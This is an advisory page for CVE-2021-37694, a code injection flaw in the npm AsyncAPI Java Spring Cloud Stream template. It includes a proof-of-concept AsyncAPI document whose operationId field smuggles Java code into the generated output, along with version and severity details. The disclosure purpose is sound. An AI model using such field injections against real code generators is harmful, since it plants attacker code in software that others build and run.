Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXhqNnItMmpwbS1xdnhw
Code injection issue for java-spring-cloud-stream-template
The following was initially reported by @jonaslagoni:
Given the following command:
ag ./dummy.json @asyncapi/java-spring-cloud-stream-template --force-write --output ./output
With the following AsyncAPI document:
{
"asyncapi": "2.0.0",
"info": {
"title": "Streetlight",
"version": "1.0.0"
},
"defaultContentType": "json",
"channels": {
"security/audit/channel": {
"description": "Channel for the turn on command which should turn on the streetlight",
"parameters": {
"streetlight_id": {
"description": "The ID of the streetlight",
"schema": {
"type": "string"
}
}
},
"publish": {
"operationId": "test() { System.out.println(\"injected\"); return test(0); }\n public Consumer<CustomClass> someothername",
"message": {
"name": "TurnonCommand",
"payload": {
"$ref": "#/components/schemas/CustomClass"
}
}
}
}
},
"components": {
"schemas" : {
"CustomClass": {
"type": "object",
"properties": {
"prop": {
"type": "string"
}
}
}
}
}
}
Which changes the following output:
...
@Bean
public Consumer<CustomClass> test() {
// Add business logic here.
return null;
}
...
To
...
@Bean
public Consumer<CustomClass> test() { System.out.println("injected"); return someothername(); }
public Consumer<CustomClass> someothername() {
// Add business logic here.
return null;
}
...
Permalink: https://github.com/advisories/GHSA-xj6r-2jpm-qvxpJSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXhqNnItMmpwbS1xdnhw
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: about 3 years ago
Updated: over 1 year ago
CVSS Score: 8.7
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
Identifiers: GHSA-xj6r-2jpm-qvxp, CVE-2021-37694
References:
- https://github.com/asyncapi/java-spring-cloud-stream-template/security/advisories/GHSA-xj6r-2jpm-qvxp
- https://nvd.nist.gov/vuln/detail/CVE-2021-37694
- https://github.com/advisories/GHSA-xj6r-2jpm-qvxp
Blast Radius: 2.6
Affected Packages
npm:@asyncapi/java-spring-cloud-stream-template
Dependent packages: 7Dependent repositories: 2
Downloads: 533 last month
Affected Version Ranges: <= 0.6.9
Fixed in: 0.7.0
All affected versions: 0.3.0, 0.3.1, 0.3.2, 0.4.0, 0.4.1, 0.5.0, 0.6.0, 0.6.1, 0.6.2, 0.6.3, 0.6.4, 0.6.5, 0.6.6, 0.6.7, 0.6.8, 0.6.9
All unaffected versions: 0.7.0, 0.7.1, 0.7.2, 0.7.3, 0.7.4, 0.8.0, 0.9.0, 0.9.1, 0.10.0, 0.11.0, 0.11.1, 0.11.2, 0.11.3, 0.11.4, 0.11.5, 0.11.6, 0.11.7, 0.12.0, 0.12.1, 0.13.0, 0.13.1, 0.13.2, 0.13.3, 0.13.4